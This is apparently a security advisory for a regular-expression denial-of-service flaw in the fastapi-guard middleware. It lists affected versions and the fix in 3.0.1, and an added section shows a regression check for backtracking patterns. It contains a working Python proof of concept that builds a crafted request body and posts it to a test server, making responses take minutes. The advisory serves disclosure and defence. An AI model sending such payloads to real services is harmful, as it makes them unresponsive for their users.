GHSA-j47q-rc62-w448

Source
https://github.com/advisories/GHSA-j47q-rc62-w448
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-j47q-rc62-w448/GHSA-j47q-rc62-w448.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-j47q-rc62-w448
Aliases
Published
2025-07-07T23:36:39Z
Modified
2025-07-08T00:12:15.375525Z
Severity
  • 0.0 (None) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
  • 6.9 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
Summary
fastapi-guard is vulnerable to ReDoS through inefficient regex
Details

Summary

fastapi-guard detects penetration attempts by scanning incoming requests with regex patterns. However, some of the detection patterns are extremely inefficient and backtrack with polynomial complexity on specially crafted inputs.

This is not as severe as exponential-complexity ReDoS, but it still degrades performance and allows DoS exploits. An attacker can trigger high CPU usage and make a service unresponsive for hours by sending a single request only kilobytes in size.

PoC

e.g. https://github.com/rennf93/fastapi-guard/blob/1e6c2873bfc7866adcbe5fc4da72f2d79ea552e7/guard/handlers/suspatterns_handler.py#L31C79-L32C7

import requests

# Request body built from n repetitions of each fragment
payload = lambda n: '<'*n + ' '*n + 'style=' + '"'*n + ' '*n + 'url('*n  # complexity: O(n^5)

# Response time as n doubles
print(requests.post("http://172.24.1.3:8000/", data=payload(50)).elapsed)   # 0:00:03.771120
print(requests.post("http://172.24.1.3:8000/", data=payload(100)).elapsed)  # 0:01:17.952637
print(requests.post("http://172.24.1.3:8000/", data=payload(200)).elapsed)  # timeout (>15min)

Single-threaded uvicorn workers cannot handle any other concurrent requests during the elapsed time.

Impact

Penetration detection is enabled by default. Services that use fastapi-guard middleware without explicitly setting enable_penetration_detection=False are vulnerable to DoS.
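A regression check that flags a polynomially backtracking detection pattern before it ships, as an added example (not fastapi-guard's code and not its 3.0.1 fix). The patterns VULN and SAFE, the probe shape, the quantifier bounds and the 1.5 threshold are all constructed assumptions for illustration.

```python
import math
import re
import time

# Constructed pattern, NOT taken from fastapi-guard: "[^>]*" and "\s+" can both
# consume the same run of spaces, and search() retries from every "<".
VULN = re.compile(r"<[^>]*\s+style")
# Same intent with bounded quantifiers (bounds are assumed limits on tag and
# whitespace length), so the work per start position is capped.
SAFE = re.compile(r"<[^>]{0,128}\s{1,8}style")


def probe(n):
    """Near-miss input: many start positions, a long run both classes accept."""
    return "<" * n + " " * n


def scan_time(pattern, text, repeats=5):
    """Best-of-N wall time for one failed search over text."""
    best = float("inf")
    for _ in range(repeats):
        start = time.perf_counter()
        pattern.search(text)
        best = min(best, time.perf_counter() - start)
    return max(best, 1e-9)  # avoid a zero divisor on very coarse clocks


def growth_exponent(pattern, n1=200, n2=400):
    """Estimate k in time ~ n^k from two input sizes."""
    t1 = scan_time(pattern, probe(n1))
    t2 = scan_time(pattern, probe(n2))
    return math.log(t2 / t1) / math.log(n2 / n1)


def is_superlinear(pattern, threshold=1.5):
    """True when scan time grows faster than n**threshold on the probe input."""
    return growth_exponent(pattern) > threshold


if __name__ == "__main__":
    for name, pat in (("VULN", VULN), ("SAFE", SAFE)):
        print(f"{name}: time ~ n^{growth_exponent(pat):.1f}")
```

Bounding the quantifiers narrows what the pattern accepts (tags longer than the bound are no longer matched), so the bounds have to be chosen against real traffic.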

Database specific
{
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-1333"
    ],
    "nvd_published_at": "2025-07-07T20:15:28Z",
    "github_reviewed_at": "2025-07-07T23:36:39Z",
    "severity": "MODERATE"
}
References

Affected packages

PyPI / fastapi-guard

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (Unknown introduced version / All previous versions are affected)
Fixed
3.0.1

Affected versions

0.*

0.1.0
0.2.0
0.3.2
0.3.3
0.3.4
0.4.0

1.*

1.0.0
1.1.0
1.2.0
1.2.1
1.2.2
1.3.2
1.4.0
1.5.0

2.*

2.0.0
2.0.1
2.1.0
2.1.1
2.1.2
2.1.3

3.*

3.0.0

Database specific

{
    "last_known_affected_version_range": "<= 3.0.0"
}